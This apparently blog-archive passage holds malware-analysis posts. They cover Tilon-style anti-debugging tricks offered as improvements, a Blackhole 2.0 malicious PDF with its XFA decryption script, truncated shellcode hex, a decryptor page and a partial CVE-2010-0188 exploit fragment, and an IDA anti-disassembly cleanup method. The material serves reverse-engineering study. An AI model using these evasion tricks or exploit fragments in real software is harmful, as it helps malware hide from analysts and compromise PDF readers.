<span style="font-family: Courier New, Courier, monospace;">008D0A19 RETN</span><br />
<span style="font-family: Courier New, Courier, monospace;">008D0A1A MOV BYTE PTR DS:[8D036D],7A <span style="color: #38761d;">; small snippet in case of no debugger</span></span><br />
<span style="font-family: Courier New, Courier, monospace;">008D0A21 JMP 008D02FA</span><br />
<span style="font-family: Courier New, Courier, monospace;">008D0A26 ADD BYTE PTR DS:[EAX],AL</span><br />
<br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">When the code will jump to the encrypted bytes, the exception will call the "hooked" KiUserExceptionDispatcher API, that:</span><br />
<ul>
<li><span style="font-family: Verdana, sans-serif;">will jump directly to </span><span style="font-family: Courier New, Courier, monospace;">008D2FA</span><span style="font-family: Verdana, sans-serif;"> (the decryption routine), using the wrong key, if the debugger is detected;</span></li>
<li><span style="font-family: Verdana, sans-serif;">will jump to the small snippet in the listing above, that will restore the correct decryption key and then jump to </span><span style="font-family: Courier New, Courier, monospace;">008D2FA</span><span style="font-family: Verdana, sans-serif;">, otherwise.</span></li>
</ul>
<br />
<span style="font-family: Verdana, sans-serif;">In this way, if an analyst doesn't notice the <i>PEB</i> control (stepping over its call, </span><span style="font-family: Verdana, sans-serif;">for instance),</span><span style="font-family: Verdana, sans-serif;"> the bytes won't be decrypted in the right way and this will cause a crash.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">In my opinion, this version of the trick is way better than <i>Tilon</i>'s original implementation, but we can improve it much more if we chose not to consider how it was originally structured (that is strongly related to the exception caused by the execution of the encrypted bytes...).</span><br />
<br />
<br />
<span style="font-family: Verdana, sans-serif; font-size: large;"><u>Another way to implement the trick (my fav one ;))</u></span><br />
<span style="font-family: Verdana, sans-serif;"><u><br /></u>Another variant of <i>Tilon</i>'s original implementation of the trick is the following.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">We have to set a global variable </span><span style="font-family: Verdana, sans-serif;">(let's say </span><span style="font-family: 'Courier New', Courier, monospace;">00BD0AB0</span><span style="font-family: Verdana, sans-serif;">) </span><span style="font-family: Verdana, sans-serif;">that contains an address memory</span><span style="font-family: Verdana, sans-serif;">, depending on the result of the <i>PEB</i> anti-debugging trick. Then, w</span><span style="font-family: Verdana, sans-serif;">e need to generate an appropriate exception (for example, by reaching a null pointer</span><span style="font-family: Verdana, sans-serif;">) and to "hook" the <i>KiUserDispatcher</i> API by injecting a </span><span style="font-family: Courier New, Courier, monospace;">JMP 00BD0AB0 </span><span style="font-family: Verdana, sans-serif;">(the hidden instruction!).</span><br />
<span style="font-family: Verdana, sans-serif;">Thus, we have something like:</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;">mov eax, 0</span><br />
<span style="font-family: Courier New, Courier, monospace;">mov [eax], 0</span><br />
<span style="font-family: Courier New, Courier, monospace;">* junk code *</span><br />
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Verdana, sans-serif;">The idea is to use the PEB check to set the global variable </span><span style="font-family: Courier New, Courier, monospace;">00BD0AB0</span><span style="font-family: Verdana, sans-serif;"> to the address of </span><span style="font-family: Courier New, Courier, monospace;">* junk code *</span><span style="font-family: Verdana, sans-serif;"> if the debugger is revealed, and to set it to the right address (where the real code is) otherwise. In this way, the analyst may not notice the "hook" at all, but will use <i>shift+F8</i> to continue its debugging from the instruction right after the exception.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">The following diagram will clarify the procedure:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8IyKRT2pFqx_FeydOdULcjovNjmNKU3ifwQj8XybGl7R6bDlB5LtuKMhFG6RyYc8L4nf5a46-Gxjp1ndUArvfLzYfVZ1-K_yoLDuBF-TFYGoT0z6-lXaP5s9-idpDyPgToQlt4kEFLHs/s1600/schema4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="296" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8IyKRT2pFqx_FeydOdULcjovNjmNKU3ifwQj8XybGl7R6bDlB5LtuKMhFG6RyYc8L4nf5a46-Gxjp1ndUArvfLzYfVZ1-K_yoLDuBF-TFYGoT0z6-lXaP5s9-idpDyPgToQlt4kEFLHs/s640/schema4.png" width="640" /></a></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Of course you can choose a different (more subtle and less visible) way to generate the exception, but the thing is that you can really confuse the analysis using the </span><span style="font-family: Courier New, Courier, monospace;">* junk code *</span><span style="font-family: Verdana, sans-serif;"> and this can be really time consuming from the analyst perspective. For instance, you can insert some junk code and then terminate the process, or anything else.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Moreover, it's less detectable than setting the jump directly in the PEB check, because of the hidden instruction and the fact that the debugging will continue its execution after the exception itself like you would normally expect.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Note also that the PEB check is only one of the possible tricks to detect the debugger and you can obviously chose a different one!</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif; font-size: large;"><u>Conclusion</u></span><br />
<br />
<span style="font-family: Verdana, sans-serif;">You can use this technique on its own, or mixing it with other tricks. In case you chose to combine different tricks together, the risk of being detected will increase... but so will the number of possible uses you can make!</span>giuliahttp://www.blogger.com/profile/12995367052667481710noreply@blogger.com1tag:blogger.com,1999:blog-8573685359056491736.post-43485217041530806042012-10-11T03:21:00.000-07:002012-10-11T03:28:55.919-07:00Some notes about the pdf exploits in Blackhole 2.0<span style="font-family: Verdana, sans-serif;">Recently we have been hearing a lot about Blackhole 2.0, the last edition of the popular exploit kit, and so I started looking around to gather some more information. In particular, I searched for some websites hosting it and found out a pdf file that caught my attention (you can find it in </span><span style="font-family: Courier New, Courier, monospace;"><blackhole_host>/data/t.pdf</span><span style="font-family: Verdana, sans-serif;">). </span><br />
<div class="p2">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">The curious thing about it is that it doesn't contain any malicious code and if we look closer we understand that it's only a sort of skeleton for the real malicious pdf.</span></div>
<div class="p2">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">In fact, just analyzing the raw bytes we see the following streams:</span></div>
<div class="p2">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">3 0 obj<<%data%/CreationDate(%title%)>></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">endobj</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">42 0 obj<</Length 504/Filter[/FlateDecode]/Type/EmbeddedFile>>stream</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">%config%</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">endstream</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">endobj</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">43 0 obj<</Length 1313/Filter/FlateDecode/Type/EmbeddedFile>>stream</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">%js%</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">endstream</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">endobj</span></div>
<div class="p2">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p2">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">This suggests us that maybe the malicious pdf is built at runtime: it seems that the fields </span><span style="font-family: Courier New, Courier, monospace;">%data%</span><span style="font-family: Verdana, sans-serif;">, </span><span style="font-family: Courier New, Courier, monospace;">%title%</span><span style="font-family: Verdana, sans-serif;">, </span><span style="font-family: Courier New, Courier, monospace;">%config%</span><span style="font-family: Verdana, sans-serif;"> and </span><span style="font-family: Courier New, Courier, monospace;">%js%</span><span style="font-family: Verdana, sans-serif;"> are filled each time with data related to a different exploit, depending on the vulnerability found on the victim's system. Moreover, it is a novelty for the Blackhole exploit kit, as the other versions didn't make use of a similar approach.</span></div>
<div class="p2">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">So, I conducted further investigations, searched for some live exploit urls to perform a real infection and take a log with WireShark. I then extracted the pdf file from it and started analyzing it.</span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">To do that I used an utility named PDFStreamDumper, that successfully decompresses the streams (note that some other alternatives, such as pdftk, failed in this attempt as maybe the file was intentionally corrupted in order to make the inspection more difficult).</span></div>
<div class="p2">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">The important streams are the same as the ones listed above, but in this case they are filled with some data (they are reported in a slightly different notation because I had to decompress them). Here they are, together with a brief explanation: </span></div>
<div class="p3">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;">3</span></div>
<div class="p5">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;"><<</span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span"> </span>/Keywords(3a3p3p1h3a3l3e3r40233e423e3n401h403a3r3g3e401h3c3r3e3a403i3o3n2a3a403e1h3r3e3p3l3a3c3e1b1i1f1i3g1f1a1a1c21423a3r133p3a3d3d3i3n3g21423a3r133b3b3b1f13… **ENCRYPTED EXPLOIT BYTES** …383j1l1b383l3l1l1c21433i403h1b473k20383l3l1m491c382f1j1b3k1c212f3m3a3g3e2c3i3e3l3d1k1h3r3a432s3a3l413e23383l3l1k49383j1m1b1c21)/CreationDate(6683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5… **SHELLCODE BYTES** ...6363636d7477723d3033303333333034333430383335333830393035266c71786d746e66623d30332668657a6e647865663d746c796d6626717666707870656f3d75777462730000)</span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;">>></span></div>
<div class="p5">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p4">
<span style="font-family: Verdana, sans-serif;">This stream contains both the encrypted javascript exploit and the shellcode.</span></div>
<div class="p5">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p5">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;">42</span></div>
<div class="p5">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;"><config xmlns="<a href="http://www.xfa.org/schema/xci/1.0/"><span class="s1">http://www.xfa.org/schema/xci/1.0/</span></a>" xmlns:xfa="<a href="http://www.xfa.org/schema/xci/1.0/"><span class="s1">http://www.xfa.org/schema/xci/1.0/</span></a>"><trace><area level="1" name="font"></area></trace><agent name="designer"><!-- [0..n] --><destination>pdf</destination><pdf><!-- [0..n] --><fontInfo></fontInfo></pdf></agent><present><!-- [0..n] --><pdf><!-- [0..n] --><fontInfo><embed>1</embed></fontInfo><version>1.6</version><creator>Adobe Designer 7.0</creator><producer>Adobe Designer 7.0</producer><scriptModel>XFA</scriptModel><interactive>1</interactive><tagged>1</tagged><compression><level>6</level><compressLogicalStructure>1</compressLogicalStructure></compression></pdf><xdp><packets>*</packets></xdp><destination>pdf</destination></present><acrobat><acrobat7><dynamicRender>forbidden</dynamicRender></acrobat7><common><locale></locale><data><incrementalLoad></incrementalLoad><adjustData></adjustData><xsl><uri></uri></xsl><outputXSL><uri></uri></outputXSL></data><template><base>C:\</base><relevant></relevant><uri></uri></template></common></acrobat></config></span></div>
<div class="p5">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p4">
<span style="font-family: Verdana, sans-serif;">This stream contains some xml data.</span></div>
<div class="p5">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p5">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;">43</span></div>
<div class="p5">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;"><!--&lt;template>--><template><subform layout="tb" locale="ru_RU" name="form1"><pageSet><pageArea id="Page1" name="Page1"><contentArea h="10.5in" w="8in" x="0.25in" y="0.25in"></contentArea><medium long="11in" short="8.5in" stock="letter"></medium></pageArea></pageSet><subform h="10.5in" w="8in"><field h="98.425mm" name="ImageField1" w="28.575mm" x="95.25mm" y="19.05mm"><ui><imageEdit></imageEdit></ui><caption placement="bottom" reserve="5mm"><font typeface="Myriad Pro"></font><para vAlign="middle"></para><value><text>Image Field</text></value></caption><border xmlns="<a href="http://www.xfa.org/schema/xfa-template/2.2/"><span class="s1">http://www.xfa.org/schema/xfa-template/2.2/</span></a>"><edge presence="hidden"></edge><edge stroke="dotted"></edge><edge stroke="dotted"></edge><edge stroke="dashed"></edge><corner stroke="dotted"></corner><corner stroke="dotted"></corner><corner stroke="dashed"></corner><fill><pattern type="crossDiagonal"></pattern></fill></border><event xmlns:xfa="<a href="http://www.xfa.org/schema/xfa-template/2.2/"><span class="s1">http://www.xfa.org/schema/xfa-template/2.2/</span></a>" activity="initialize"></span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;"><xfa:script contentType='application/x-javascript'></span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;">with(event){</span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;">k=target[/**/"eval"];</span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;">if((app.addMenuItem+/**/"").indexOf(/**/'native')!=-1){a=/**/target.keywords;}</span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;">}</span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;">s="";</span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;">z=a;</span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;">/**/ss/**/=/**/String.fromCharCode/**/;</span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;">for(i=0;i&lt;a.length;i+=2){</span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span"> </span>s=s.concat(ss(parseInt(z[i]+z[1+i],0x1d)));</span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;">}</span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;">k(s);</span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;"></xfa:script></event></field></subform><proto></proto></subform><?templateDesigner DefaultLanguage FormCalc?><?templateDesigner DefaultRunAt client?><?templateDesigner Grid show:1, snap:1, units:0, color:ff8080, origin:(0,0), interval:(125000,125000)?><?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?><?templateDesigner Zoom 76?></template></span></div>
<div class="p5">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p4">
<span style="font-family: Verdana, sans-serif;">This stream contains the script that decrypts the exploit itself.</span></div>
<div class="p5">
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p4">
<span style="font-family: Verdana, sans-serif;">To decrypt the exploit, you can use the following html page ("z" contains the encrypted bytes):</span></div>
<div class="p5">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace;"><html></span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace;"><head></span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace;"><title>Decrypted Exploit</title></span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace;"></head></span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace;"><body></span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace;"><script language="javascript"></span></div>
<div class="p7">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace;">var z;</span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace;">var s;</span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace;"><span class="s2">z = "</span>3a3p3p1h3a3l3e3r40233e423e3n401h403a3r3g3e401h3c3r3e3a403i3o3n2a3a403e1h3r3e3p3l3a3c3e1b1i1f1i3g1f1a1a1c21423a3r133p3a3d3d3i3n3g21423a3r133b3b3b1f13… **ENCRYPTED EXPLOIT BYTES** …383j1l1b383l3l1l1c21433i403h1b473k20383l3l1m491c382f1j1b3k1c212f3m3a3g3e2c3i3e3l3d1k1h3r3a432s3a3l413e23383l3l1k49383j1m1b1c21<span class="s2">";</span></span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace;">s = "";</span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace;">for(i=0; i < z.length; i+=2)</span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace;">{</span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace;"> document.write(String.fromCharCode(parseInt(z[i]+z[1+i], 0x1d)));</span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace;"> if(String.fromCharCode(parseInt(z[i]+z[1+i], 0x1d)) == ';' )</span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace;"> document.write("<br/>");</span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace;">}</span></div>
<div class="p7">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace;"></script></span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace;"></body></span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace;"></html></span></div>
<div class="p3">
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p8">
<span style="font-family: Verdana, sans-serif;">Which leads to the following well known vulnerability (<span class="s3">CVE-2010-0188)</span>:</span></div>
<div class="p3">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p8">
<span style="font-family: Courier New, Courier, monospace;">*REMOVED*</span></div>
<div class="p8">
<span style="font-family: Courier New, Courier, monospace;">…</span></div>
<div class="p9">
<span style="font-family: Courier New, Courier, monospace;"><span class="s4"><span style="color: purple;"> _j8='SUkqADggAABB'; </span><span style="color: #274e13;">// * </span></span><span style="color: #274e13;">base64 representation of a TIFF</span></span><span style="color: #274e13; font-family: Courier New, Courier, monospace;"> header! *</span></div>
<div class="p8">
<span style="font-family: Courier New, Courier, monospace;"> _j9=_I2('QUFB',10984);</span></div>
<div class="p8">
<span style="font-family: Courier New, Courier, monospace;"> _ll0='QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';</span></div>
<div class="p8">
<span style="font-family: Courier New, Courier, monospace;"> _ll1=_j8+_j9+_ll0+_j5;</span></div>
<div class="p8">
<span style="font-family: Courier New, Courier, monospace;"> _ll2=_ji1(_j7,'');</span></div>
<div class="p8">
<span style="font-family: Courier New, Courier, monospace;"> if(_ll2.length%2)_ll2+=unescape('');</span></div>
<div class="p8">
<span style="font-family: Courier New, Courier, monospace;"> _ll3=_j2(_ll2);</span></div>
<div class="p8">
<span style="font-family: Courier New, Courier, monospace;"> with(</span></div>
<div class="p8">
<span style="font-family: Courier New, Courier, monospace;"> {</span></div>
<div class="p8">
<span style="font-family: Courier New, Courier, monospace;"> k:_ll3</span></div>
<div class="p8">
<span style="font-family: Courier New, Courier, monospace;"> }</span></div>
<div class="p8">
<span style="font-family: Courier New, Courier, monospace;"> )_I0(k);</span></div>
<div class="p8">
<span style="color: purple; font-family: Courier New, Courier, monospace;"> ImageField1.rawValue=_ll1</span></div>
<div class="p8">
<span style="font-family: Courier New, Courier, monospace;">…</span></div>
<div class="p8">
<span style="font-family: Courier New, Courier, monospace;">*REMOVED*</span></div>
<div class="p3">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p3">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p8">
<span style="font-family: Verdana, sans-serif;">I also gathered some other malicious pdf files and found out that they are structured always in the same way: the decryption script may change a little (for example, I found "0x1C" instead of "0x1D", that is the numerical base employed to interpret the bytes), but the method itself will be very similar.</span></div>
giuliahttp://www.blogger.com/profile/12995367052667481710noreply@blogger.com0tag:blogger.com,1999:blog-8573685359056491736.post-46238969562007990732012-09-29T19:00:00.000-07:002012-09-29T16:58:35.321-07:00Cleaning off anti-disassembly code: the IDC way.<span style="font-family: Verdana, sans-serif;">Every code that can be executed, can also be reversed. Although, there are some tricks to make this task: more time-consuming; more intricate; more difficult to be turned into an automated analysis.</span><br />
<div class="p2">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">What's the problem? A sequence of executable code can be disassembled in many different ways, so disassemblers have to use some heuristics that, for their nature, are subject to limitations. Anti-Disassembly techniques take advantage of them!</span></div>
<div class="p2">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">When an executable code is disassembled, each byte of it occurs in the representation of one, and only one, instruction at the time. So, if the disassembler is forced to make an instruction starting from the wrong offset, the instruction shown by it won't match the one being executed.</span></div>
<div class="p2">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">In this article I will discuss one of these tricks. The trick itself is not really a big deal as it's a well known one, but I found it to be very annoying as I had to deal with it recently, in the attempt of reversing a malware. For this reason, I decided to automate the task of cleaning off the code and developed a little IDC script, based on some assumptions I'm going to explain.</span></div>
<div class="p2">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">Let's consider a code in the following form:</span></div>
<div class="p2">
<br /></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">call loc_40106A</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">401050: db 'string01', 0</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">40106A: * assembly instructions *</span><br />
<span style="font-family: Courier New, Courier, monospace;">......: .....</span></div>
<div class="p2">
<br />
<br /></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">It will be disassembled as:</span></div>
<div class="p2">
<br /></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">call loc_401050+0A</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">401050: * assembly instructions corresponding to the string interpreted as a code *</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">40106A: * assembly instructions *</span><br />
<span style="font-family: Courier New, Courier, monospace;">......: .....</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Verdana, sans-serif;">(This is an approximate representation: note that the bytes of the string interpreted as opcodes may unalign the instruction at 40106A)</span></div>
<div class="p2">
<br /></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">The idea behind the trick is very simple: IDA is unable to distinguish between text and code and makes wrong assumptions while disassembling the executable. In particular, IDA doesn't realize that, following the control-flow, the bytes it interpreted as code (right after the call instruction) are never executed and, thus, they are only text.</span></div>
<div class="p2">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">Moreover, it is very disturbing from the analyst perspective as it basically hides strings, making it useless to search for them, and also results in some weird disassembled instructions, that complicate the listing.</span></div>
<div class="p2">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">So, what's the idea to clean off the code?</span></div>
<div class="p2">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">First, we have to search for a short call, that corresponds to the "E8" opcode and we assume that its operand, that is the following 4 bytes, will have a value between 1 and 100.</span></div>
<div class="p2">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">Once we find a similar situation, we undefine the bytes of code corresponding to the string with "MakeUnkwown", and then we use "MakeStr" to recompose the original string correctly.</span></div>
<div class="p2">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">Unfortunatly, even if this procedure will solve most of the cases, it isn't general enough to solve all of them.</span></div>
<div class="p2">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;">Let's consider the following example:</span></div>
<div class="p2">
<br /></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E2A E8 09 00 00 00 call near ptr loc_403E37+1</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E2F 69 64 65 6E 74 69 74 79 imul esp, [ebp+6Eh], 79746974h</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E37 loc_403E37: </span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E37 00 57 8D add [edi-73h], dl</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E3A 83 8D 28 40 00 FF D0 or dword ptr [ebp-0FFBFD8h], 0FFFFFFD0h</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E41 83 C7 08 add edi, 8</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E44 2B CF sub ecx, edi</span></div>
<div class="p2">
<br /></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">After the procedure described above, it will become:</span></div>
<div class="p2">
<br /></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E2A E8 09 00 00 00 call near ptr unk_403E38</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E2F 69 64 65 6E 74 69 74 79+aIdentity db 'identity',0</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E38 57 unk_403E38 db 57h </span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E39 8D db 8Dh </span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E3A 83 8D 28 40 00 FF D0 or dword ptr [ebp-0FFBFD8h], 0FFFFFFD0h</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E41 83 C7 08 add edi, 8</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E44 2B CF sub ecx, edi</span></div>
<div class="p2">
<br /></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">As you can see, IDA has also undefined some bytes after the string (which should have been legitimate assembly instructions); so, to solve the problem, we may think to go at the end of it and reconvert everything in code, using "MakeCode". But is that enough?</span></div>
<div class="p2">
<br /></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E2A E8 09 00 00 00 call loc_403E38</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E2F 69 64 65 6E 74 69 74 79+aIdentity db 'identity',0</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E38</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E38 loc_403E38: </span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E38 57 push edi</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E39 8D db 8Dh </span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E3A 83 8D 28 40 00 FF D0 or dword ptr [ebp-0FFBFD8h], 0FFFFFFD0h</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E41 83 C7 08 add edi, 8</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace;">seg000:00403E44 2B CF sub ecx, edi</span></div>
<div class="p2">
<br /></div>
<div class="p1">
<span style="font-family: Verdana, sans-serif;"><br /></span>
